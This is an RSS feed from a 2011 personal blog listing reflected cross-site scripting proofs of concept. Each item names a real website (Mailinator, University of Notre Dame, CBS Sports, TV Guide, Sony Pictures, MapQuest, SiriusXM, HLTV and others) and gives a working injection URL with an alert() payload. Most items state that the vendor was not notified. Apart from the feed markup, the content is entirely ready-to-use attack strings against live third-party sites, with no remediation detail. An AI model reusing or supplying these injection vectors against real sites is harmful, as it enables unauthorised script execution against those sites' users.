<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>benburns.org</title>
	<atom:link href="http://benburns.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://benburns.org</link>
	<description>keystroking out</description>
	<lastBuildDate>Thu, 29 Dec 2011 18:57:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Mailinator.com</title>
		<link>http://benburns.org/2011/12/mailinator-com/</link>
		<comments>http://benburns.org/2011/12/mailinator-com/#comments</comments>
		<pubDate>Thu, 29 Dec 2011 18:57:06 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=162</guid>
		<description><![CDATA[Date: Dec-29-2011 Vendor Notified: No Proof of Concept: http://www.mailinator.com/maildir.jsp?email=--&#62;&#60;/script&#62;&#60;script&#62;alert('0');&#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Dec-29-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.mailinator.com/maildir.jsp?email=--&gt;&lt;/script&gt;&lt;script&gt;alert('0');&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/12/mailinator-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>University of Notre Dame</title>
		<link>http://benburns.org/2011/09/university-of-notre-dame/</link>
		<comments>http://benburns.org/2011/09/university-of-notre-dame/#comments</comments>
		<pubDate>Sun, 25 Sep 2011 17:45:29 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=152</guid>
		<description><![CDATA[Date: Sept-25-2011 Vendor Notified: No Proof of Concept: https://apps.nd.edu/webdirectory/directory.cfm?cn=&#60;script&#62;alert('0');&#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Sept-25-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>https://apps.nd.edu/webdirectory/directory.cfm?cn=&lt;script&gt;alert('0');&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/09/university-of-notre-dame/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>University of Notre Dame WebFile</title>
		<link>http://benburns.org/2011/09/university-of-notre-dame-webfile/</link>
		<comments>http://benburns.org/2011/09/university-of-notre-dame-webfile/#comments</comments>
		<pubDate>Sun, 25 Sep 2011 17:41:25 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=148</guid>
		<description><![CDATA[Date: Sept-25-2011 Vendor Notified: No Proof of Concept: https://webfile.nd.edu/~&#60;/script&#62;&#60;script&#62;alert('0');&#60;/script&#62;/apps/webfile &#160; Note: After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials.  Previous XSS will be present and spark an internal server error.]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Sept-25-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>https://webfile.nd.edu/~&lt;/script&gt;&lt;script&gt;alert('0');&lt;/script&gt;/apps/webfile</code></p>
<p>&nbsp;</p>
<p><span style="text-decoration: underline;">Note:</span><br />
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials.  Previous XSS will be present and spark an internal server error.</p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/09/university-of-notre-dame-webfile/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CBS Sports</title>
		<link>http://benburns.org/2011/08/cbs-sports/</link>
		<comments>http://benburns.org/2011/08/cbs-sports/#comments</comments>
		<pubDate>Sun, 21 Aug 2011 02:33:37 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=146</guid>
		<description><![CDATA[Date: Aug-20-2011 Vendor Notified: No Proof of Concept: http://www.cbssports.com/info/search#q=//";//\";//--&#62;&#60;/script&#62;"&#62;'&#62;&#60;script&#62;alert(0)&#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Aug-20-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.cbssports.com/info/search#q=//";//\";//--&gt;&lt;/script&gt;"&gt;'&gt;&lt;script&gt;alert(0)&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/08/cbs-sports/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AddictingGames</title>
		<link>http://benburns.org/2011/08/addictinggames/</link>
		<comments>http://benburns.org/2011/08/addictinggames/#comments</comments>
		<pubDate>Sun, 21 Aug 2011 02:20:02 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=143</guid>
		<description><![CDATA[Date: Aug-20-2011 Vendor Notified: No Proof of Concept: http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&#38;text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Aug-20-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&amp;text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/08/addictinggames/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TV Guide</title>
		<link>http://benburns.org/2011/08/tv-guide/</link>
		<comments>http://benburns.org/2011/08/tv-guide/#comments</comments>
		<pubDate>Thu, 18 Aug 2011 04:58:14 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=136</guid>
		<description><![CDATA[Date: Aug-18-2011 Vendor Notified: No Proof of Concept: http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Aug-18-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/08/tv-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sony Pictures</title>
		<link>http://benburns.org/2011/08/sony-pictures/</link>
		<comments>http://benburns.org/2011/08/sony-pictures/#comments</comments>
		<pubDate>Thu, 18 Aug 2011 04:42:23 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=133</guid>
		<description><![CDATA[Date: Aug-18-2011 Vendor Notified: No Proof of Concept: http://search.sonypictures.com/search?q=%22;alert%280%29//&#38;proxystylesheet=sp-us&#38;site=sp-us]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Aug-18-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://search.sonypictures.com/search?q=%22;alert%280%29//&amp;proxystylesheet=sp-us&amp;site=sp-us</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/08/sony-pictures/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MapQuest</title>
		<link>http://benburns.org/2011/07/mapquest/</link>
		<comments>http://benburns.org/2011/07/mapquest/#comments</comments>
		<pubDate>Wed, 27 Jul 2011 03:49:03 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=99</guid>
		<description><![CDATA[Date: Jul-26-2011 Vendor Notified: Yes Proof of Concept: http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&#038;postalCode=\%27;alert(0)//]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Jul-26-2011<br />
<strong>Vendor Notified:</strong> Yes<br />
<strong>Proof of Concept:</strong><br />
<code>http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&#038;postalCode=\%27;alert(0)//</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/07/mapquest/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SiriusXM Satellite Radio</title>
		<link>http://benburns.org/2011/07/siriusxm-satellite-radio/</link>
		<comments>http://benburns.org/2011/07/siriusxm-satellite-radio/#comments</comments>
		<pubDate>Mon, 25 Jul 2011 03:47:53 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=96</guid>
		<description><![CDATA[Date: Jul-24-2011 Vendor Notified: No Proof of Concept: http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&#038;childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&#038;cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&#038;pagename=SXM%2FWrapper]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> Jul-24-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&#038;childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&#038;cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&#038;pagename=SXM%2FWrapper</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/07/siriusxm-satellite-radio/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HLTV.org</title>
		<link>http://benburns.org/2011/05/hltv-org/</link>
		<comments>http://benburns.org/2011/05/hltv-org/#comments</comments>
		<pubDate>Sun, 08 May 2011 03:46:20 +0000</pubDate>
		<dc:creator>Ben Burns</dc:creator>
				<category><![CDATA[XSS Vulnerabilities]]></category>

		<guid isPermaLink="false">http://benburns.org/?p=93</guid>
		<description><![CDATA[Date: May-07-2011 Vendor Notified: No Proof of Concept: http://www.hltv.org/?pageid=198&#038;search=1&#038;teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E]]></description>
			<content:encoded><![CDATA[<p><strong>Date:</strong> May-07-2011<br />
<strong>Vendor Notified:</strong> No<br />
<strong>Proof of Concept:</strong><br />
<code>http://www.hltv.org/?pageid=198&#038;search=1&#038;teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E</code></p>
]]></content:encoded>
			<wfw:commentRss>http://benburns.org/2011/05/hltv-org/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

